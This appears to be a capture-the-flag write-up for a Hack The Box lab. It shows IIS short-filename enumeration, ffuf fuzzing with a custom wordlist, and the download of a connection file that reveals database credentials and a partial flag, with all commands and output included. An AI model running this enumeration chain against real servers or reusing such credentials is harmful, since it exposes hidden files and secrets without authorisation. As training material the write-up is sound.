when a request is made to a file or folder with a long name, IIS may generate a short 8.3 alias for compatibility reasons. The tilde character "~" is used to represent the short name
For example, if you have a file with a long name like "mydocument.txt," IIS might generate a short name like "MYDOCU~1.TXT" and you can access it using a URL like: http://example.com/MYDOCU~1.TXT
Making a GET Request do not give us anything, but using a OPTIONS request->
➜ poo curl -s -I -X OPTIONS 'http://10.13.38.11/ta*~1*/.aspx'
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
Date: Thu, 18 Jan 2024 04:25:43 GMT
Content-Length: 0
We ll use a tool that will FUZZ for all possible files.
https://github.com/lijiejie/IIS_shortname_Scanner
➜ poo python3 /opt/IIS_shortname_Scanner/iis_shortname_scan.py http://10.13.38.11
Server is vulnerable, please wait, scanning...
[+] /t~1.* [scan in progress]
[+] /d~1.* [scan in progress]
[+] /n~1.* [scan in progress]
[+] /w~1.* [scan in progress]
[+] /te~1.* [scan in progress]
[+] /tr~1.* [scan in progress]
[+] /ds~1.* [scan in progress]
[+] /ne~1.* [scan in progress]
[+] /we~1.* [scan in progress]
[+] /tem~1.* [scan in progress]
[+] /tra~1.* [scan in progress]
[+] /ds_~1.* [scan in progress]
[+] /new~1.* [scan in progress]
[+] /web~1.* [scan in progress]
[+] /temp~1.* [scan in progress]
[+] /tras~1.* [scan in progress]
[+] /ds_s~1.* [scan in progress]
[+] /newf~1.* [scan in progress]
[+] /templ~1.* [scan in progress]
[+] /trash~1.* [scan in progress]
[+] /ds_st~1.* [scan in progress]
[+] /newfo~1.* [scan in progress]
[+] /templa~1.* [scan in progress]
[+] /trashe~1.* [scan in progress]
[+] /ds_sto~1.* [scan in progress]
[+] /newfol~1.* [scan in progress]
[+] /templa~1 [scan in progress]
[+] Directory /templa~1 [Done]
[+] /trashe~1 [scan in progress]
[+] Directory /trashe~1 [Done]
[+] /ds_sto~1 [scan in progress]
[+] Directory /ds_sto~1 [Done]
[+] /newfol~1 [scan in progress]
[+] Directory /newfol~1 [Done]
----------------------------------------------------------------
Dir: /templa~1
Dir: /trashe~1
Dir: /ds_sto~1
Dir: /newfol~1
----------------------------------------------------------------
4 Directories, 0 Files found in total
Note that * is a wildcard, matches any character zero or more times.
I tried to fuzz different directories, using the above tool, Eventually i fuzzed for the /dev directory
➜ poo python3 /opt/IIS_shortname_Scanner/iis_shortname_scan.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx* [scan in progress]
[+] /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [scan in progress]
[+] File /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: /dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
0 Directories, 1 Files found in total
Note that * is a wildcard, matches any character zero or more times.
We can find that .txt file by fuzzing. It starts with poo_co and ends with .txt we can make a word list.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt | grep ^co > wordlist
➜ poo for i in $(cat wordlist ); do echo $i.txt;done > w
➜ poo mv w wordlist
➜ poo ffuf -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ -w wordlist --mc all --fs 1245
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ
:: Wordlist : FUZZ: /home/nakul/Desktop/ctf/htb-EndGames/poo/wordlist
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 1245
________________________________________________
[Status: 200, Size: 142, Words: 3, Lines: 7, Duration: 610ms]
* FUZZ: connection.txt
:: Progress: [1340/1340] :: Job [1/1] :: 51 req/sec :: Duration: [0:00:22] :: Errors: 1 ::
Found the files ->http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
poo wget http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
--2024-01-18 10:18:45-- http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
Connecting to 10.13.38.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 142 [text/plain]
Saving to: ‘poo_connection.txt’
poo_connection.txt 100%[===============================================>] 142 --.-KB/s in 0s
2024-01-18 10:18:47 (12.7 MB/s) - ‘poo_connection.txt’ saved [142/142]
➜ www cat poo_connection.txt
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{fcfb0767--SNIP--